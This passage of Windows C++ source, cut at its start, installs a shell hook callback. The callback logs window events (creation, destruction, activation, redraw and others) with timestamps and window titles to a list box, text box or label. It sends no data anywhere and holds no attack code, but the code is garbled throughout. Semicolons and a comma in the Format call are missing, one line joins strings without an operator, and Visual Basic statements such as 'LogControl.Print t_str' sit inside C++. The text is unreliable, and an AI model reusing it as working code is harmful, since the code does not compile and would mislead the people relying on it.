LogControl = mLogControl; }
__except (EXCEPTION_EXECUTE_HANDLER)
{
;
}
}void UnRegLogWindow (HWND hwnd)
{
RegisterShellHook(hwnd, 0);
SetWindowLong(hwnd, GWL_WNDPROC, LogWinOldProc);
}long WindowProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)//' 回调函数
{
LONG i;
CString m_Out_String;
CString recTime;
CString recParam;
if (Shell_Hook_Msg_ID==uMsg)
{
SYSTEMTIME temp_SystemTime;
GetSystemTime ( &temp_SystemTime);
recTime.Format( "%4d-%2d-%2d:%2d-%2d-%2d\t0x%x\t0x%x ", temp_SystemTime.wYear, temp_SystemTime.wMonth, temp_SystemTime.wDay,
temp_SystemTime.wHour, temp_SystemTime.wMinute, temp_SystemTime.wSecond
wParam, lParam); switch ( wParam)
{
case HSHELL_WINDOWCREATED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWCREATED" + "\t" + " " + m_Out_String;
break;
case HSHELL_WINDOWDESTROYED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWDESTROYED" + "\t" + " " + m_Out_String;
break;
case HSHELL_ACTIVATESHELLWINDOW:
m_Out_String = recTime + "HSHELL_ACTIVATESHELLWINDOW";
break;
case HSHELL_WINDOWACTIVATED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWACTIVATEED" + "\t" + " " + m_Out_String;
break;
case HSHELL_GETMINRECT:
m_Out_String = recTime+ "HSHELL_GETMINRECT"
break; case HSHELL_REDRAW:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_REDRAW" + "\t" + " " + m_Out_String;
break;
case HSHELL_TASKMAN:
m_Out_String = recTime+ "HSHELL_TASKMAN";
break;
case HSHELL_LANGUAGE:
m_Out_String = recTime+ "HSHELL_LANGUAGE";
break;
case HSHELL_SYSMENU:
m_Out_String = recTime "HSHELL_SYSMENU";
break;
case HSHELL_ENDTASK:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_ENDTASK" + "\t" + " " + m_Out_String;
break;
case HSHELL_ACCESSIBILITYSTATE:
m_Out_String = recTime+ "HSHELL_ACCESSIBILITYSTATE"
break;
case HSHELL_APPCOMMAND:
m_Out_String = recTime+ "HSHELL_APPCOMMAND"
break;
case HSHELL_WINDOWREPLACED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWREPLACED" + "\t" + " " + m_Out_String;
break; case HSHELL_WINDOWREPLACING:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_WINDOWREPLACING" + "\t" + " " + m_Out_String;
break;
case HSHELL_FLASH:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_FLASH" + "\t" + " " + m_Out_String;
break;
case HSHELL_RUDEAPPACTIVATED:
m_Out_String.Empty();
i = GetWindowText(lParam, m_Out_String, 260);// ' 取窗体的标题
if (i > 0)
{
m_Out_String= m_Out_String.Left ( i);
}
else
{
m_Out_String = "UnNamed"
}
m_Out_String = recTime + "HSHELL_RUDEAPPACTIVATEED" + "\t" + " " + m_Out_String;
break; } if (0!=m_Out_String.size ())
{
m_WriteToControl(m_Out_String);
} }
else
{
return CallWindowProc ( LogWinOldProc, hwnd, uMsg, wParam, lParam)
}
}
void m_WriteToControl(CString t_str)
{
switch ( LogControlType)
{ case tListBox:
LogControl.AddItem (t_str);
break;
case tTextBox:
LogControl.Text = LogControl.Text+ "\t"+ t_str;
break;
case tForm:
case tPictureBox:
LogControl.Print t_str;
break;
case tLabel:
LogControl.Caption = t_str;
break;
}
}